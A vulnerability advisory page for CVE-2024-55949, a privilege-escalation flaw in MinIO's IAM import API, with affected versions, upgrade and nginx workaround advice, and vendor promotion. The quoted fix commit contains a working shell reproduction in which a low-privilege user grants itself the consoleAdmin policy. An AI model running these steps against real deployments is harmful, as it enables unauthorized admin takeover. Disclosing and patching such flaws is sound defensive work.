CVE-2024-55949

CVE-2024-55949 is a high-severity improper privilege management vulnerability in github.com/minio/minio (go), affecting versions >= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41. It is fixed in 0.0.0-20241213221912-68b004a48f41.

Summary

Workarounds

There are no workarounds possible, all users are advised to upgrade immediately if you don't run MinIO behind a load balancer.

Behind a load balancer / firewall such as nginx .

location /minio/admin/v2/import-iam {
...
}
location /minio/admin/v3/import-iam-v2 {
...

Following locations can be blocked from external access, temporarily disallowing the API calls completely until the deployments can be upgraded.

References

Refer https://github.com/minio/minio/pull/20756 for more information

Binary Releases

AiStor Containers

quay.io/minio/aistor/minio:RELEASE.2024-12-13T13-42-41Z
quay.io/minio/aistor/minio:RELEASE.2024-12-13T13-42-41Z.fips

AiStor Binaries

Architecture: linux/amd64

Architecture: linux/arm64

Architecture: windows/amd64

Community Containers

quay.io/minio/minio:RELEASE.2024-12-13T22-19-12Z
quay.io/minio/minio:RELEASE.2024-12-13T22-19-12Z.fips

Community Binaries

Architecture: linux/amd64

Architecture: linux/arm64

Architecture: windows/amd64

Credits

Credit goes to National Security Agency for reporting this issue.

Impact

Privilege escalation in IAM import API, all users are impacted since MinIO commit 580d9db85e04f1b63cc2909af50f0ed08afa965f

The application assigns, modifies, tracks, or checks privileges incorrectly, allowing a user to gain elevated access. Typical impact: privilege escalation beyond the intended level.

Affected versions

github.com/minio/minio (>= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41)

Security releases

github.com/minio/minio → 0.0.0-20241213221912-68b004a48f41 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

commit f246c9053f9603e610d98439799bdd2a6b293427
Author: Aditya Manthramurthy <[email protected]>
Date:   Wed Dec 11 18:09:40 2024 -0800

    fix: Privilege escalation in IAM import API (#20756)
    
    This API had missing permissions checking, allowing a user to change
    their policy mapping by:
    
    1. Craft iam-info.zip file: Update own user permission in
    user_mappings.json
    2. Upload it via `mc admin cluster iam import nobody iam-info.zip`
    
    Here `nobody` can be a user with pretty much any kind of permission (but
    not anonymous) and this ends up working.
    
    Some more detailed steps - start from a fresh setup:
    
    ```
    ./minio server /tmp/d{1...4} &
    mc alias set myminio http://localhost:9000 minioadmin minioadmin
    mc admin user add myminio nobody nobody123
    mc admin policy attach myminio readwrite nobody nobody123
    mc alias set nobody http://localhost:9000 nobody nobody123
    
    mc admin cluster iam export myminio
    mkdir /tmp/x && mv myminio-iam-info.zip /tmp/x
    cd /tmp/x
    unzip myminio-iam-info.zip
    echo '{"nobody":{"version":1,"policy":"consoleAdmin","updatedAt":"2024-08-13T19:47:10.1Z"}}' > \
          iam-assets/user_mappings.json
    zip -r myminio-iam-info-updated.zip iam-assets/
    
    mc admin cluster iam import nobody ./myminio-iam-info-updated.zip
    mc admin service restart nobody
    ```

Frequently Asked Questions

  1. What is CVE-2024-55949? CVE-2024-55949 is a high-severity improper privilege management vulnerability in github.com/minio/minio (go), affecting versions >= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41. It is fixed in 0.0.0-20241213221912-68b004a48f41. The application assigns, modifies, tracks, or checks privileges incorrectly, allowing a user to gain elevated access.
  2. Which versions of github.com/minio/minio are affected by CVE-2024-55949? github.com/minio/minio (go) versions >= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41 is affected.
  3. Is there a fix for CVE-2024-55949? Yes. CVE-2024-55949 is fixed in 0.0.0-20241213221912-68b004a48f41. Upgrade to this version or later.
  4. Is CVE-2024-55949 exploitable, and should I be worried? Whether CVE-2024-55949 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2024-55949 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2024-55949? Upgrade github.com/minio/minio to 0.0.0-20241213221912-68b004a48f41 or later.

Other vulnerabilities in github.com/minio/minio

CVE-2026-42600CVE-2026-41145CVE-2026-39414CVE-2026-34204CVE-2026-33419

Stop the waste.
Protect your environment with Kodem.